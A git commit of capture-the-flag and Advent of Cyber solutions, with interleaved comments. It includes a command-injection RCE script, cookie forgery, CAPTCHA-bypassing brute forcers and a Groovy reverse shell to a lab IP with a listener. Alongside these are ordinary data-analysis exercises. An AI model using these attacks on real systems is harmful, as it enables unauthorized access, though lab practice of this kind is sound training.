Added initial code.
parent 5808d2f805 · commit 1f7a9b0566
22 changed files with 309132 additions and 1 deletion
17 htb/challenges/web-baby-auth/solve.py Normal file
@@ -0,0 +1,17 @@
#!/usr/bin/env python3

import requests

ip = '188.166.175.58' # change this
port = '32249' # change this

cookies = { 'PHPSESSID': 'eyJ1c2VybmFtZSI6ImFkbWluIn0K' } # base64 of '{"username":"admin"}'
data = { 'username': 'admin', 'password': 'admin' }

r = requests.get(f'http://{ip}:{port}/', data=data, cookies=cookies)

data = r.text
data = data.split('<h1>')[-1]
data = data.split('</h1>')[0]

print(data.strip())
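The forged PHPSESSID above is nothing more than base64-encoded JSON, so it can be rebuilt from scratch rather than copied; a minimal sketch (the trailing newline matters for the exact byte-for-byte match):

import base64

# '{"username":"admin"}' plus a trailing newline encodes to the
# eyJ1c2VybmFtZSI6ImFkbWluIn0K value used in solve.py above
forged = base64.b64encode(b'{"username":"admin"}\n').decode()
print(forged)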
45 htb/challenges/web-baby-nginxatsu/config_51 Normal file
@@ -0,0 +1,45 @@
user www;
pid /run/nginx.pid;
error_log /dev/stderr info;

events {
    worker_connections 1024;
}

http {
    server_tokens off;

    charset utf-8;
    keepalive_timeout 20s;
    sendfile on;
    tcp_nopush on;
    client_max_body_size 2M;

    include /etc/nginx/mime.types;

    server {
        listen 80;
        server_name _;

        index index.php;
        root /www/public;

        # We sure hope so that we don't spill any secrets
        # within the open directory on /storage

        location /storage {
            autoindex on;
        }

        location / {
            try_files $uri $uri/ /index.php?$query_string;
            location ~ \.php$ {
                try_files $uri =404;
                fastcgi_pass unix:/run/php-fpm.sock;
                fastcgi_index index.php;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                include fastcgi_params;
            }
        }
    }
}
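The `autoindex on` for /storage is the giveaway in this config: anything dropped into that directory is browsable, which is how a config backup like the config_51 file above gets pulled. A quick sketch of fetching the listing (host and port are placeholders for a live challenge instance):

import requests

# autoindex on -> nginx serves a plain HTML directory listing for /storage/
listing = requests.get('http://CHALLENGE_IP:PORT/storage/').text
print(listing)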
19 htb/challenges/web-looking-glass/index.php Normal file
@@ -0,0 +1,19 @@
<?php
function getUserIp()
{
    return $_SERVER['REMOTE_ADDR'];
}

function runTest($test, $ip_address)
{
    if ($test === 'ping')
    {
        system("ping -c4 ${ip_address}");
    }
    if ($test === 'traceroute')
    {
        system("traceroute ${ip_address}");
    }
}

?>
16 htb/challenges/web-looking-glass/solve.py Normal file
@@ -0,0 +1,16 @@
#!/usr/bin/env python3

from requests import post

cmd = input('rce>> ')
ip = '159.65.20.166' # change this
port = '30526' # change this

data = {'test': 'ping', 'ip_address': f'{ip}; {cmd}', 'submit': 'Test'}
r = post(f'http://{ip}:{port}/', data=data)

data = r.text
data = data.split('packet loss\n')[-1]
data = data.split('</textarea>')[0]

print(data.strip())
11 thm/aoc23/day02/1_packets_captured.py Executable file
@@ -0,0 +1,11 @@
#!/usr/bin/env python3
import pandas as pd
import matplotlib.pyplot as plt

df = pd.read_csv('network_traffic.csv')
df.head(5)

# We need to use the Pandas count() function on the dataframe
# For example: dataframe.count()

print(df.count())
10 thm/aoc23/day02/2_ip_address.py Executable file
@@ -0,0 +1,10 @@
#!/usr/bin/env python3
import pandas as pd

df = pd.read_csv('network_traffic.csv')
df.head(5)

# We need to group by the "Source" (or "Destination") column and apply the Pandas size() function.
# For example: dataframe.groupby(['ColumnName']).size()

print(df.groupby(['Source']).size().sort_values(ascending=False))
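The comment above mentions "Destination" as well; the receiving side falls out of the same one-liner against the df loaded in that script:

# same aggregation keyed on the destination address
print(df.groupby(['Destination']).size().sort_values(ascending=False))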
8 thm/aoc23/day02/3_protocol.py Executable file
@@ -0,0 +1,8 @@
#!/usr/bin/env python3
import pandas as pd
import matplotlib.pyplot as plt

df = pd.read_csv('network_traffic.csv')
df.head(5)

print(df['Protocol'].value_counts())
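matplotlib is imported above but never used, so a plot was presumably intended; a quick bar chart of the same counts, reusing df and plt from that script:

# visualise the protocol distribution that value_counts() tabulates
df['Protocol'].value_counts().plot(kind='bar')
plt.show()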
101 thm/aoc23/day02/network_traffic.csv Normal file
@@ -0,0 +1,101 @@
PacketNumber,Timestamp,Source,Destination,Protocol
1,05:49.5,10.10.1.7,10.10.1.9,HTTP
2,05:50.3,10.10.1.10,10.10.1.3,TCP
3,06:10.3,10.10.1.1,10.10.1.2,HTTP
4,06:10.4,10.10.1.9,10.10.1.3,ICMP
5,06:10.4,10.10.1.1,10.10.1.7,ICMP
6,06:10.4,10.10.1.10,10.10.1.8,DNS
7,06:10.4,10.10.1.6,10.10.1.7,ICMP
8,06:10.4,10.10.1.2,10.10.1.10,HTTP
9,06:10.4,10.10.1.9,10.10.1.3,DNS
10,06:10.4,10.10.1.7,10.10.1.7,TCP
11,06:10.4,10.10.1.8,10.10.1.5,HTTP
12,06:10.4,10.10.1.3,10.10.1.4,DNS
13,06:10.4,10.10.1.2,10.10.1.5,ICMP
14,06:10.4,10.10.1.3,10.10.1.2,DNS
15,06:10.4,10.10.1.6,10.10.1.6,ICMP
16,06:10.4,10.10.1.4,10.10.1.8,DNS
17,06:10.4,10.10.1.9,10.10.1.3,ICMP
18,06:10.4,10.10.1.8,10.10.1.9,HTTP
19,06:10.5,10.10.1.5,10.10.1.7,HTTP
20,06:10.5,10.10.1.9,10.10.1.1,DNS
21,06:10.5,10.10.1.8,10.10.1.5,ICMP
22,06:10.5,10.10.1.3,10.10.1.2,HTTP
23,06:10.5,10.10.1.3,10.10.1.6,ICMP
24,06:10.5,10.10.1.8,10.10.1.8,HTTP
25,06:10.5,10.10.1.3,10.10.1.4,DNS
26,06:10.5,10.10.1.4,10.10.1.10,ICMP
27,06:10.6,10.10.1.2,10.10.1.7,ICMP
28,06:10.6,10.10.1.3,10.10.1.5,TCP
29,06:10.6,10.10.1.10,10.10.1.7,DNS
30,06:10.6,10.10.1.9,10.10.1.3,DNS
31,06:10.6,10.10.1.4,10.10.1.2,ICMP
32,06:10.6,10.10.1.4,10.10.1.5,TCP
33,06:10.6,10.10.1.10,10.10.1.3,TCP
34,06:10.6,10.10.1.5,10.10.1.1,ICMP
35,06:10.6,10.10.1.6,10.10.1.4,TCP
36,06:10.6,10.10.1.6,10.10.1.8,ICMP
37,06:10.6,10.10.1.6,10.10.1.2,DNS
38,06:10.6,10.10.1.6,10.10.1.4,ICMP
39,06:10.6,10.10.1.1,10.10.1.9,TCP
40,06:10.6,10.10.1.6,10.10.1.10,DNS
41,06:10.6,10.10.1.8,10.10.1.7,HTTP
42,06:10.6,10.10.1.2,10.10.1.6,TCP
43,06:10.6,10.10.1.8,10.10.1.2,TCP
44,06:10.6,10.10.1.4,10.10.1.1,TCP
45,06:10.6,10.10.1.1,10.10.1.8,ICMP
46,06:10.6,10.10.1.8,10.10.1.2,HTTP
47,06:10.6,10.10.1.9,10.10.1.9,ICMP
48,06:10.6,10.10.1.1,10.10.1.5,TCP
49,06:10.6,10.10.1.5,10.10.1.10,DNS
50,06:10.6,10.10.1.6,10.10.1.2,DNS
51,05:49.5,10.10.1.10,10.10.1.4,TCP
52,05:50.3,10.10.1.6,10.10.1.7,ICMP
53,06:10.3,10.10.1.3,10.10.1.7,HTTP
54,06:10.4,10.10.1.2,10.10.1.9,HTTP
55,06:10.4,10.10.1.7,10.10.1.5,DNS
56,06:10.4,10.10.1.4,10.10.1.4,HTTP
57,06:10.4,10.10.1.9,10.10.1.10,ICMP
58,06:10.4,10.10.1.9,10.10.1.9,TCP
59,06:10.4,10.10.1.8,10.10.1.2,ICMP
60,06:10.4,10.10.1.2,10.10.1.9,DNS
61,06:10.4,10.10.1.6,10.10.1.3,ICMP
62,06:10.4,10.10.1.4,10.10.1.6,DNS
63,06:10.4,10.10.1.4,10.10.1.4,TCP
64,06:10.4,10.10.1.3,10.10.1.4,HTTP
65,06:10.4,10.10.1.4,10.10.1.6,HTTP
66,06:10.4,10.10.1.9,10.10.1.3,HTTP
67,06:10.4,10.10.1.6,10.10.1.8,TCP
68,06:10.4,10.10.1.10,10.10.1.6,TCP
69,06:10.5,10.10.1.2,10.10.1.7,HTTP
70,06:10.5,10.10.1.6,10.10.1.1,HTTP
71,06:10.5,10.10.1.1,10.10.1.9,DNS
72,06:10.5,10.10.1.9,10.10.1.5,ICMP
73,06:10.5,10.10.1.10,10.10.1.5,DNS
74,06:10.5,10.10.1.6,10.10.1.10,DNS
75,06:10.5,10.10.1.2,10.10.1.8,HTTP
76,06:10.5,10.10.1.2,10.10.1.3,TCP
77,06:10.6,10.10.1.7,10.10.1.3,ICMP
78,06:10.6,10.10.1.3,10.10.1.7,DNS
79,06:10.6,10.10.1.3,10.10.1.7,TCP
80,06:10.6,10.10.1.7,10.10.1.8,HTTP
81,06:10.6,10.10.1.1,10.10.1.6,TCP
82,06:10.6,10.10.1.3,10.10.1.2,HTTP
83,06:10.6,10.10.1.5,10.10.1.3,DNS
84,06:10.6,10.10.1.3,10.10.1.2,TCP
85,06:10.6,10.10.1.4,10.10.1.8,ICMP
86,06:10.6,10.10.1.4,10.10.1.2,DNS
87,06:10.6,10.10.1.4,10.10.1.2,DNS
88,06:10.6,10.10.1.4,10.10.1.1,HTTP
89,06:10.6,10.10.1.2,10.10.1.3,TCP
90,06:10.6,10.10.1.2,10.10.1.5,HTTP
91,06:10.6,10.10.1.2,10.10.1.3,ICMP
92,06:10.6,10.10.1.10,10.10.1.2,ICMP
93,06:10.6,10.10.1.9,10.10.1.4,HTTP
94,06:10.6,10.10.1.6,10.10.1.9,TCP
95,06:10.6,10.10.1.4,10.10.1.4,TCP
96,06:10.6,10.10.1.8,10.10.1.3,DNS
97,06:10.6,10.10.1.1,10.10.1.3,ICMP
98,06:10.6,10.10.1.3,10.10.1.3,DNS
99,06:10.6,10.10.1.4,10.10.1.3,TCP
100,06:10.6,10.10.1.5,10.10.1.2,ICMP
20 thm/aoc23/day03/brute.py Normal file
@@ -0,0 +1,20 @@
#!/usr/bin/env python3
import requests

url = 'http://10.10.136.61:8000/login.php'

def login(pin):
    r = requests.post(url, data = { 'pin': pin }, allow_redirects=True)
    return r

#print(login('123').text)
with open('pw.lst', 'r') as fh:
    pins = [ line.strip() for line in fh.read().split('\n') if line ]

for pin in pins:
    res = login(pin).text
    data = res.split('<h1 class="text-5xl text-red">')[-1]
    data = data.split('</h1>')[0]
    if data != 'Access Denied':
        print(f'The PIN is: {pin}')
        break
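The loop above is strictly sequential; if the target tolerates it, a thread pool speeds the brute force up considerably. A sketch reusing login() and pins from the script above (the worker count is an arbitrary choice):

from concurrent.futures import ThreadPoolExecutor

def try_pin(pin):
    # same response parsing as the sequential loop
    res = login(pin).text
    verdict = res.split('<h1 class="text-5xl text-red">')[-1].split('</h1>')[0]
    return pin if verdict != 'Access Denied' else None

with ThreadPoolExecutor(max_workers=8) as pool:
    for hit in pool.map(try_pin, pins):
        if hit:
            print(f'The PIN is: {hit}')
            break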
4096 thm/aoc23/day03/pw.lst Normal file
File diff suppressed because it is too large
23 thm/aoc23/day12/backup.sh Normal file
@@ -0,0 +1,23 @@
#!/bin/sh

mkdir /var/lib/jenkins/backup
mkdir /var/lib/jenkins/backup/jobs /var/lib/jenkins/backup/nodes /var/lib/jenkins/backup/plugins /var/lib/jenkins/backup/secrets /var/lib/jenkins/backup/users

cp /var/lib/jenkins/*.xml /var/lib/jenkins/backup/
cp -r /var/lib/jenkins/jobs/ /var/lib/jenkins/backup/jobs/
cp -r /var/lib/jenkins/nodes/ /var/lib/jenkins/backup/nodes/
cp /var/lib/jenkins/plugins/*.jpi /var/lib/jenkins/backup/plugins/
cp /var/lib/jenkins/secrets/* /var/lib/jenkins/backup/secrets/
cp -r /var/lib/jenkins/users/* /var/lib/jenkins/backup/users/

tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5

username="tracy"
password="13_1n_33"
Ip="localhost"
sshpass -p "$password" scp /var/lib/jenkins/backup.tar.gz $username@$Ip:/home/tracy/backups
/bin/sleep 10

rm -rf /var/lib/jenkins/backup/
rm -rf /var/lib/jenkins/backup.tar.gz
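This Jenkins backup job hard-codes tracy's SSH password, which is the pivot on this box. A minimal sketch of reusing it (paramiko assumed available; the target IP is a placeholder):

import paramiko

# log in with the credentials leaked by backup.sh above
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('TARGET_IP', username='tracy', password='13_1n_33')
_, out, _ = ssh.exec_command('id')
print(out.read().decode())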
4 thm/aoc23/day12/rev-shell.groovy Normal file
@@ -0,0 +1,4 @@
String host="10.14.42.37";
int port=1886;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
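The Groovy payload above connects back to host:port, so something has to be listening there first. `nc -lvnp 1886` is the usual choice; a rough Python equivalent for completeness:

#!/usr/bin/env python3
# minimal catcher for the Groovy reverse shell above (stand-in for `nc -lvnp 1886`)
import socket
import sys
import threading

srv = socket.socket()
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(('0.0.0.0', 1886))
srv.listen(1)
conn, addr = srv.accept()
print(f'[+] shell from {addr[0]}:{addr[1]}')

def pump():
    # relay whatever the remote shell prints back to our terminal
    for chunk in iter(lambda: conn.recv(4096), b''):
        sys.stdout.write(chunk.decode(errors='replace'))
        sys.stdout.flush()

threading.Thread(target=pump, daemon=True).start()

# forward our command lines to the remote /bin/bash
for line in sys.stdin:
    conn.sendall(line.encode())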
100 thm/aoc23/day14/detector.py Normal file
@@ -0,0 +1,100 @@
#These are the imports that we need for our Neural Network
#Numpy is a powerful array and matrix library used to format our data
import numpy as np
#Pandas is a data-analysis library that allows for reading and formatting data structures
import pandas as pd
#This will be used to split our data
from sklearn.model_selection import train_test_split
#This is used to normalize our data
from sklearn.preprocessing import StandardScaler
#This is used to encode our text data to integers
from sklearn.preprocessing import LabelEncoder
#This is our Multi-Layer Perceptron Neural Network
from sklearn.neural_network import MLPClassifier

#These are the colour labels that we will convert to int
colours = ["Red", "Blue", "Green", "Yellow", "Pink", "Purple", "Orange"]


#Read the training and testing data files
training_data = pd.read_csv("training_dataset.csv")
training_data.head()

testing_data = pd.read_csv("testing_dataset.csv")
testing_data.head()

#The Neural Network cannot take strings as input, therefore we encode the strings as integers
encoder = LabelEncoder()
encoder.fit(training_data["Colour Scheme"])
training_data["Colour Scheme"] = encoder.transform(training_data["Colour Scheme"])
testing_data["Colour Scheme"] = encoder.transform(testing_data["Colour Scheme"])

#Read the data we will train on
X = np.asanyarray(training_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
#Read the labels of our training data
y = np.asanyarray(training_data['Defective'].astype('int'))

#Read our testing data
test_X = np.asanyarray(testing_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])

#This will split our training dataset into two with an 80/20 split
train_X, validate_X, train_y, validate_y = train_test_split(X, y, test_size=0.2)

print("Sample of our data:")
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))

#Normalize our dataset
scaler = StandardScaler()
scaler.fit(train_X)

train_X = scaler.transform(train_X)
validate_X = scaler.transform(validate_X)
test_X = scaler.transform(test_X)

print("Sample of our data after normalization:")
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))

#Create our classifier
clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(15, 2), max_iter=10000)

print("Starting to train our Neural Network")

#Train our classifier
clf.fit(train_X, train_y)

#Validate our Neural Network
y_predicted = clf.predict(validate_X)

#This loop tests how well your Neural Network performs with the validation dataset
count_correct = 0
count_incorrect = 0
for x in range(len(y_predicted)):

    if (y_predicted[x] == validate_y[x]):
        count_correct += 1
    else:
        count_incorrect += 1

print("Training has been completed, validating neural network now....")
print("Total Correct:\t\t" + str(count_correct))
print("Total Incorrect:\t" + str(count_incorrect))

accuracy = ((count_correct * 1.0) / (1.0 * (count_correct + count_incorrect)))

print("Network Accuracy:\t" + str(accuracy * 100) + "%")

print("Now we will predict the testing dataset for which we don't have the answers")

#Make prediction on the testing data that was not labelled by the elves
y_test_predictions = clf.predict(test_X)

#This block saves your predictions to a text file that can be uploaded for scoring
print("Saving predictions to a file")

output = open("predictions.txt", 'w')

for value in y_test_predictions:
    output.write(str(value) + "\n")

print("Predictions are saved, this file can now be uploaded to verify your Neural Network")
output.close()
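The manual correct/incorrect counting above works, but sklearn ships the same metric; a one-call equivalent for cross-checking, reusing validate_y and y_predicted from the script:

from sklearn.metrics import accuracy_score

# same number the counting loop produces, as a fraction in [0, 1]
print(accuracy_score(validate_y, y_predicted))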
200001 thm/aoc23/day14/testing_dataset.csv Normal file
File diff suppressed because it is too large
100001 thm/aoc23/day14/training_dataset.csv Normal file
File diff suppressed because it is too large
40 thm/aoc23/day15/complete.py Normal file
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
import numpy as np
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import classification_report

#Read the email dataset.
data = pd.read_csv('emails_dataset.csv')
df = pd.DataFrame(data)

#Convert text to numbers.
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(df['Message'])

#Split the dataset for training and testing
y = df['Classification']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)

#Train the model
clf = MultinomialNB()
clf.fit(X_train, y_train)

#Evaluate the model's performance
y_pred = clf.predict(X_test)
print(classification_report(y_test, y_pred))

#Run a simple single-message test against the model
message = vectorizer.transform(["Today's Offer! Claim ur $150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. $3.00 Sub. 16 . Unsbub reply X"])
prediction = clf.predict(message)
print("The email is: ", prediction[0])

#Run the complete test of the emails inside "test_emails.csv"
test_data = pd.read_csv("test_emails.csv")

X_new = vectorizer.transform(test_data['Messages'])
new_predictions = clf.predict(X_new)
results_df = pd.DataFrame({'Messages': test_data['Messages'], 'Prediction': new_predictions})
print(results_df)
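The vectorize-then-fit plumbing above collapses into a sklearn Pipeline if you prefer one object that accepts raw text; a functionally equivalent sketch, reusing df and the imports from the script:

from sklearn.pipeline import make_pipeline

# CountVectorizer -> MultinomialNB in a single estimator; predict() takes raw strings
spam_clf = make_pipeline(CountVectorizer(), MultinomialNB())
spam_clf.fit(df['Message'], df['Classification'])
print(spam_clf.predict(["Claim ur $150 worth of discount vouchers!"])[0])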
4452 thm/aoc23/day15/emails_dataset.csv Normal file
File diff suppressed because it is too large
37 thm/aoc23/day15/test_emails.csv Normal file
@@ -0,0 +1,37 @@
Messages
Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations.
Kind of. Took it to garage. Centre part of exhaust needs replacing. Part ordered n taking it to be fixed tomo morning.
Fighting with the world is easy
Why must we sit around and wait for summer days to celebrate. Such a magical sight when the worlds dressed in white. Oooooh let there be snow.
Oh
ALERT!!!! Get a Chance to Win a 1000$ voucher on your Next Purchase by share the information about the Best Festival company-- the secret code is 'I_HaTe_BesT_FestiVal'
i cant talk to you now.i will call when i can.dont keep calling.
Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob
Don't worry though
Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later.
I sent you the prices and do you mean the g
Goodmorning
Its good
Ü takin linear algebra today?
Hey so whats the plan this sat?
Hey i will be late ah... Meet you at 945+
I fetch yun or u fetch?
Ok lor. I ned 2 go toa payoh 4 a while 2 return smth u wan 2 send me there or wat?
I like dis sweater fr mango but no more my size already so irritating.
What makes you most happy?
No idea
All done
Did either of you have any idea's? Do you know of anyplaces doing something?
Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out.
Hey... Very inconvenient for your sis a not huh?
Great! So what attracts you to the brothas?
In life when you face choices Just toss a coin not becoz its settle the question But while the coin in the air U will know what your heart is hoping for. Gudni8
Haha mayb u're rite... U know me well. Da feeling of being liked by someone is gd lor. U faster go find one then all gals in our group attached liao.
Somebody set up a website where you can play hold em using eve online spacebucks
I'm really sorry I lit your hair on fire
Hello! How's you and how did saturday go? I was just texting to see if you'd decided to do anything tomo. Not that i'm trying to invite myself or anything!
And very importantly
Ok Chinese food on its way. When I get fat you're paying for my lipo.
I'm used to it. I just hope my agents don't drop me since i've only booked a few things this year. This whole me in boston
Mode men or have you left.
You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later.
82 thm/aoc23/day16/brute.py Normal file
@@ -0,0 +1,82 @@
#!/usr/bin/env python3
import requests
import base64
import json
from bs4 import BeautifulSoup

username = 'admin'
passwords = []

# URLs for our requests
website_url = 'http://hqadmin.thm:8000'
model_url = 'http://localhost:8501/v1/models/ocr:predict'

# Load in the passwords for Brute Forcing
with open('passwords.txt', 'r') as wordlist:
    lines = wordlist.readlines()
    for line in lines:
        passwords.append(line.replace('\n', ''))

access_granted = False
count = 0

# Run the Brute Force Attack until we are out of passwords or have gained access
while(access_granted == False and count < len(passwords)):
    # Run a Brute Force for each password
    password = passwords[count]

    # Connect to webapp to get the CAPTCHA.
    # We use a session so the cookies are taken care of for us.
    sess = requests.session()
    r = sess.get(website_url)

    # Use soup to parse the HTML and extract the CAPTCHA image.
    soup = BeautifulSoup(r.content, 'html.parser')
    img = soup.find('img')
    encoded_image = img['src'].split(' ')[1]

    # Build the JSON request to send to the CAPTCHA predictor
    model_data = {
        'signature_name' : 'serving_default',
        'inputs' : {'input' : {'b64' : encoded_image} }
    }

    # Send the CAPTCHA prediction request and load the response
    r = requests.post(model_url, json=model_data)
    prediction = r.json()
    probability = prediction['outputs']['probability']
    answer = prediction['outputs']['output']

    # Increase our guessing accuracy by only submitting the answer if we are more than 90% sure
    if (probability < 0.90):
        # If lower than 90%, don't submit the CAPTCHA
        print('[-] Prediction probability too low, not submitting CAPTCHA')
        continue

    # Otherwise, submit the answer as POST data
    # Build the POST data
    website_data = {
        'username' : username,
        'password' : password,
        'captcha' : answer,
        'submit' : 'Submit+Query'
    }

    # Submit our Brute Force Attack
    r = sess.post(website_url, data=website_data)

    # Read the response and interpret the results of the attempt
    response = r.text

    # If the response tells us that we have submitted the wrong CAPTCHA, we try again with this password
    if ('Incorrect CAPTCHA value supplied' in response):
        print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
        continue
    # If the response tells us that we have submitted the wrong password, we can try with the next password
    elif ('Incorrect Username or Password' in response):
        print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
        count += 1
    # Otherwise, we have found the correct password!
    else:
        print('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
        access_granted = True
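When the OCR answers look wrong, it helps to see what the model actually received; a small debugging addition that decodes the scraped base64 CAPTCHA to disk (the file name is arbitrary):

import base64

# dump the CAPTCHA image that brute.py sent to the TensorFlow Serving endpoint
with open('captcha_debug.png', 'wb') as fh:
    fh.write(base64.b64decode(encoded_image))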
13 thm/aoc23/day16/captcha_img.py Normal file
@@ -0,0 +1,13 @@
#!/usr/bin/env python3
from captcha.image import ImageCaptcha
import random

amount = 99999
count = 10000

while count <= amount:
    image = ImageCaptcha(width = 160, height = 60)
    text = str(count)
    count += 1
    data = image.generate(text)
    image.write(text, text + ".png")
35 thm/aoc23/day16/labels.py Normal file
@@ -0,0 +1,35 @@
#!/usr/bin/env python3
import glob
from sklearn.model_selection import train_test_split

data = glob.glob("../raw_data/*.png")

print(data)

dataset = []
labels = []

for item in data:
    label = item.split('/')[-1].replace(".png","") # e.g. ../raw_data/32154.png -> 32154
    labels.append(label)
    dataset.append(item)

train_X, validate_X, train_y, validate_y = train_test_split(dataset, labels, test_size=0.2)

f = open('training.txt', 'w')

count = 0

for count in range(len(train_X)):
    f.write(train_X[count] + " " + train_y[count] + "\n")

f.close()

count = 0

f = open('testing.txt', 'w')

for count in range(len(validate_X)):
    f.write(validate_X[count] + " " + validate_y[count] + "\n")

f.close()